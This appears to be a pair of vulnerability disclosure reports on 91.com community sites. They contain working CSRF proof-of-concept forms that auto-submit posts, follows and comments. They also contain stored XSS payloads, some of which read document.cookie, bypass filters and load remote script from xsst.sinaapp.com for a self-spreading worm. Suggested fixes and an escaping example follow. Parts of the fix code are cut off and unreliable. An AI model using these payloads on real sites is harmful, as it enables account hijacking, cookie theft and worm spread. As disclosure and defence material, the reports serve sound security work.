A CSRF vulnerability in Fujian Wanglong may allow a worm to spread.
Detailed description: When handling POST and GET requests, the Referer of the POST is not verified, and no token is included in the POST data to verify that the request is legitimate, which causes the vulnerability.
Proof of vulnerability: [First]
Vulnerability address: http://t.91.com/broadcast/add
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.91.com/broadcast/add" method="post">
<input type="text" name="tid" value=""/>
<input type="text" name="content" value="XX"/>
<input type="text" name="secret" value="0"/>
<input type="text" name="video" value=""/>
<input type="text" name="upimg" value=""/>
<input type="submit" value="submit"/>
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
A broadcast may be posted in the 91 community without the user's knowledge.
========== Gorgeous split line ==========
[Second]
Vulnerability address: http://t.91.com/
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.91.com/" method="get">
<input type="text" name="controller" value="friend"/>
<input type="text" name="action" value="follow"/>
<input type="text" name="fid" value="145243793"/>
<input type="submit" value="submit"/>
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
This may cause users to follow someone without their knowledge.
========== Gorgeous split line ==========
[Third]
Vulnerability address: http://bbs.91.com/member/sign
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://bbs.91.com/member/sign" method="post">
<input type="text" name="user_sign" value="XXXX"/>
<input type="submit" value="submit"/>
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
The forum signature may be modified without the user's knowledge.
(This POST originally had a name=submit field. Later there was a conflict, and I thought it would not work if I deleted it. Who knows whether it can still be POSTed..)
========== Gorgeous split line ==========
[Fourth]
Vulnerability address: http://pz.91.com/port/comment_action.php
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://pz.91.com/port/comment_action.php" method="post">
<input type="text" name="content" value="envy, so many equipment !!! "/>
<input type="text" name="name" value=""/>
<input type="text" name="plain code" value=""/>
<input type="text" name="comment" value="http://pz.91.com/html/2012/24/15/18428/index.htm"/>
<input type="text" name="title" value="Magic domain player best equipment"/>
<input type="text" name="backUrl" value="http://news.91.com/comment/ocommentsend.htm"/>
<input type="text" name="url" value="#"/>
<input type="text" name="defind" value=""/>
<input type="text" name="charset_from" value="gbk"/>
<input type="submit" value="submit"/>
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
Comments may be posted without the user's knowledge on any page that embeds this comment box, which has a large impact.
========== Gorgeous split line ==========
[Fifth]
Vulnerability address: http://t.91.com/broadcast/rebroadcast
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.91.com/broadcast/rebroadcast" method="post">
<input type="text" name="ownermbrid" value="485158345"/>
<input type="text" name="oldbrtid" value="631"/>
<input type="text" name="curr_uid" value="485158345"/>
<input type="text" name="curr_brtid" value="631"/>
<input type="text" name="content" value="XX"/>
<input type="submit" value="submit"/>
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
The broadcast may be forwarded without the user's knowledge.
Solution:
Check the POST Referer
Add a token to the POST data
Author: imlonghao
Everyone is posting about Wanglong, SQL injection, CSRF and so on, so I am also coming to join in the fun. Last night I went to flip through Wanglong's XSS, and then I saw two community-type sites; I estimate that XSS on the other sites is of little significance. Wanglong goes back to work tomorrow, so I will post this evening ~~
It is not difficult to find several XSS instances. This can serve as a tutorial for new users looking for stored XSS.
Description:
1. First, the forum. I tested the image function in forum posts.
After posting an image normally, press F12 to open the debugging tool and find the newly posted image.
You can see that when an image is clicked, sjBBS.showImage.show is called.
View the code of sjBBS.showImage.show:
var $this = $(obj),
....
src = $this.attr('src');
....
var con = "
Therefore, if we construct src as http://image_server/2012/06/16/1339856778551/.png#'onload='alert(/OK/);//aa.png
it will become
and at this point the code in the onload is executed.
Based on the above principle, we can send the following data.
POST http://bbs.91.com/modify/42/124/4fc6df44153b79013/p4fdc979dc7930c
------WebKitFormBoundaryTPxWRJUHf4rt3qZa
Content-Disposition: form-data; name="wysiwyg"

1
------WebKitFormBoundaryTPxWRJUHf4rt3qZa
Content-Disposition: form-data; name="post_body"

[img]http://image_server/2012/06/16/1339856778551/.png#'onload='alert(/OK/);//aa.png[/img]
------WebKitFormBoundaryTPxWRJUHf4rt3qZa
Content-Disposition: form-data; name="ubb"

on
------WebKitFormBoundaryTPxWRJUHf4rt3qZa--
If we make the text on the image something like:
Click here to see the beauty!!!!!!!!!!!
users will be hit when they click!!
--------------------------------------------------
2. Stored XSS in community personal data can be used as an XSS backdoor:
every time a user views his/her user information (that is, when the user enters http://t.91.com/member/usersettings),
our JS code or JS file is executed.
Because the backdoor is under the t.91.com domain, it can be combined with the t.91.com Weibo function mentioned later;
I will not discuss that here. The following is the flaw: uniquename is filtered, but nickname is not filtered.
As for the email and mobile values below, I didn't check whether they are filtered. If they are not filtered, please filter them together!
http://t.91.com/member/Ajax_Profile
uniquename          bdhxxxxxxxxyyy
old_uniquename      visitor 293464167221304
nickname            aaaavv"><
nickname_hidden     visitor 293464167221304
realname            Li Ming
sex                 0
birth_year          0
birth_month         0
birth_day           1
birthprovince       0
birthcity           0
resideprovince      510000
residecity          510100
resideprovince_hidden   Sichuan Province
residecity_hidden   Chengdu
email
mobile
homepage
interest
introduction
Effect of the vulnerability:
Every time a user enters the personal data page, our JS code is triggered. At the same time, we can hijack the [Save] button so that every time a user modifies his/her personal data, the submission carries our malicious code, forming a long-term hijack.
--------------------------------------------------
3. Weibo image function XSS
The cause of this vulnerability is too simple to dwell on: the image field upimg does not filter double quotation marks, so an onload attribute can be added directly to run code.
POST http://t.91.com/broadcast/add
tid
content     aaaaaaaaaaaaaa
secret      0
video
upimg       http://p2.91huo.cn/t91/broadcast/c7/2d/91/c72d9149f543841f5ce0175f1f96cc1e.small.png"onload="alert(document.cookie);
The upimg above is a constructed parameter.
After we publish a microblog, users who see it are hit by the XSS, which can be used as a worm:
that is, users who see this microblog automatically post a Weibo message carrying the XSS, which then spreads across t.qq.com.
Open the debugging tool and check the injected code.
--------------------------------------------------
4. Weibo link function XSS
Still in Weibo: with a carefully constructed link, we can execute our malicious JS code and cause a Weibo worm.
The problem occurs when the UBB tag [url:address]XXXX[/url] is output.
http://t.91.com/broadcast/add
tid
content     #null#[url:http://www.baidu.com&lt;img/src=&quot;1&quot; onerror=&quot;alert&#x28;/xxxxxx/)&quot;&gt;]aaaaaaaa[/url]
secret      0
video
upimg
This part is a bit interesting.
a. The code cannot contain ().
b. If we use &#28; &#29; to represent (), then &#28; &#29; inside #...# will be treated as a microblog topic #...#.
So here I use &#x28; ... ) to bypass this restriction.
Construct content as the following code:
#null#[url:http://www.baidu.com&lt;img/src=&quot;1&quot; onerror=&quot;jQuery.getScript&#x28;'//xsst.sinaapp.com/m.js')&quot;&gt;]aaaaaaaa
Open the debugging tool and view.
Solution:
1. For the XSS, modify the sjBBS.showImage.show function.
Change
var con = "
to
function filterfunc(str) {
    return str.replace(/&/g, "&amp;").replace(/'/g, "&#x27;").replace(/\\/g, "&#x5c;");
}
var con = " ";
2. This is a regular input/output issue: filter <> when the nickname is output. If other fields in the personal data are not filtered, the same applies.
3. Filter the ", >, \ and other symbols in upimg and replace &;
4. After I added the test content, I constructed the code based on the output. I don't know what processing logic is on your server.. it's messy. Just handle it!
Author: gainover
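The attribute escaping that fixes 1 and 3 above call for, as an added JavaScript example that is not code from the original report or from the 91.com sites: an untrusted value is escaped before it is placed inside a double-quoted attribute, which neutralises both the single-quoted showImage pattern and the double-quoted upimg pattern, and the same function handles the nickname output in fix 2. The function names and sample URLs are constructed for this example; the real renderer's markup is not on the page.

```javascript
// Added example, not code from the original report or from the 91.com sites:
// escape an untrusted value before placing it in an HTML attribute, which is
// what the fixes for showImage (src re-emitted in a single-quoted attribute)
// and upimg (unfiltered double quote) both need. escapeHtml, safeImgTag and
// the sample URLs used in tests are constructed for this example.

// Escape every character that can end an attribute value or open a tag.
// '&' must go first so the later replacements are not double-escaped.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/\\/g, '&#x5c;');
}

// Minimal hardened image renderer: the value always lands inside one
// double-quoted attribute, so a quote or '>' in the input cannot create
// an onload/onerror attribute no matter what follows it.
function safeImgTag(src) {
  return '<img src="' + escapeHtml(src) + '" alt="">';
}

// Structural check: the only raw quotes in the output are the four that
// delimit src and alt, and the only '<' is the tag's own.
function wellFormed(tag) {
  const quotes = (tag.match(/"/g) || []).length;
  const lts = (tag.match(/</g) || []).length;
  return quotes === 4 && lts === 1;
}
```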